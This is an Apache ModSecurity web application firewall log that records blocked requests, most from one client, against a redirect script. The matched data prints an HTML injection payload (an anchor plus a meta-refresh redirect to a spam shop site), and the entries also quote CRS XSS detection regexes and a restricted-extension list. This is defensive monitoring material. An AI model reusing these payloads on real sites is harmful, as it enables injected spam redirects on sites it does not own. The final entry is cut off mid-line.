[Tue May 12 06:25:11.025845 2026] [security2:error] [pid 1844863:tid 1844892] [client 27.78.84.116:63539] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrp_aAnTZtx1_H_wzItQAAAVc"]
[Tue May 12 06:25:11.026127 2026] [security2:error] [pid 1844863:tid 1844892] [client 27.78.84.116:63539] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrp_aAnTZtx1_H_wzItQAAAVc"]
[Tue May 12 06:25:27.088961 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:63616] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrtwgpmE1yW0glLdg-tgAAANE"]
[Tue May 12 06:25:27.089357 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:63616] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrtwgpmE1yW0glLdg-tgAAANE"]
[Tue May 12 06:25:27.089517 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:63616] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrtwgpmE1yW0glLdg-tgAAANE"]
[Tue May 12 06:25:27.089632 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:63616] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrtwgpmE1yW0glLdg-tgAAANE"]
[Tue May 12 06:25:27.089805 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:63616] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrtwgpmE1yW0glLdg-tgAAANE"]
[Tue May 12 06:25:27.090231 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:63616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrtwgpmE1yW0glLdg-tgAAANE"]
[Tue May 12 06:25:27.090510 2026] [security2:error] [pid 1825287:tid 1825322] [client 27.78.84.116:63616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrtwgpmE1yW0glLdg-tgAAANE"]
[Tue May 12 06:25:28.654931 2026] [security2:error] [pid 1825179:tid 1825218] [client 27.78.84.116:65293] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruNr1yOh9TvizeziwQgAAAFQ"]
[Tue May 12 06:25:28.656232 2026] [security2:error] [pid 1825179:tid 1825218] [client 27.78.84.116:65293] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruNr1yOh9TvizeziwQgAAAFQ"]
[Tue May 12 06:25:28.658773 2026] [security2:error] [pid 1825179:tid 1825218] [client 27.78.84.116:65293] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruNr1yOh9TvizeziwQgAAAFQ"]
[Tue May 12 06:25:28.661588 2026] [security2:error] [pid 1825179:tid 1825218] [client 27.78.84.116:65293] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruNr1yOh9TvizeziwQgAAAFQ"]
[Tue May 12 06:25:28.661791 2026] [security2:error] [pid 1825179:tid 1825218] [client 27.78.84.116:65293] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruNr1yOh9TvizeziwQgAAAFQ"]
[Tue May 12 06:25:28.662225 2026] [security2:error] [pid 1825179:tid 1825218] [client 27.78.84.116:65293] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruNr1yOh9TvizeziwQgAAAFQ"]
[Tue May 12 06:25:28.662492 2026] [security2:error] [pid 1825179:tid 1825218] [client 27.78.84.116:65293] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruNr1yOh9TvizeziwQgAAAFQ"]
[Tue May 12 06:25:30.124341 2026] [security2:error] [pid 1825287:tid 1825315] [client 27.78.84.116:65505] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruggpmE1yW0glLdg-vgAAAMo"]
[Tue May 12 06:25:30.124767 2026] [security2:error] [pid 1825287:tid 1825315] [client 27.78.84.116:65505] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruggpmE1yW0glLdg-vgAAAMo"]
[Tue May 12 06:25:30.124936 2026] [security2:error] [pid 1825287:tid 1825315] [client 27.78.84.116:65505] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruggpmE1yW0glLdg-vgAAAMo"]
[Tue May 12 06:25:30.125045 2026] [security2:error] [pid 1825287:tid 1825315] [client 27.78.84.116:65505] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruggpmE1yW0glLdg-vgAAAMo"]
[Tue May 12 06:25:30.125240 2026] [security2:error] [pid 1825287:tid 1825315] [client 27.78.84.116:65505] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruggpmE1yW0glLdg-vgAAAMo"]
[Tue May 12 06:25:30.125666 2026] [security2:error] [pid 1825287:tid 1825315] [client 27.78.84.116:65505] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruggpmE1yW0glLdg-vgAAAMo"]
[Tue May 12 06:25:30.125967 2026] [security2:error] [pid 1825287:tid 1825315] [client 27.78.84.116:65505] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKruggpmE1yW0glLdg-vgAAAMo"]
[Tue May 12 06:25:31.186044 2026] [security2:error] [pid 1844863:tid 1844884] [client 43.153.48.240:54162] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ixinabourgoin.fr"] [uri "/"] [unique_id "agKru_aAnTZtx1_H_wzJGAAAAU8"]
[Tue May 12 06:26:06.439738 2026] [security2:error] [pid 1842385:tid 1842392] [client 34.202.88.37:64549] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/camarasexlive.com"] [unique_id 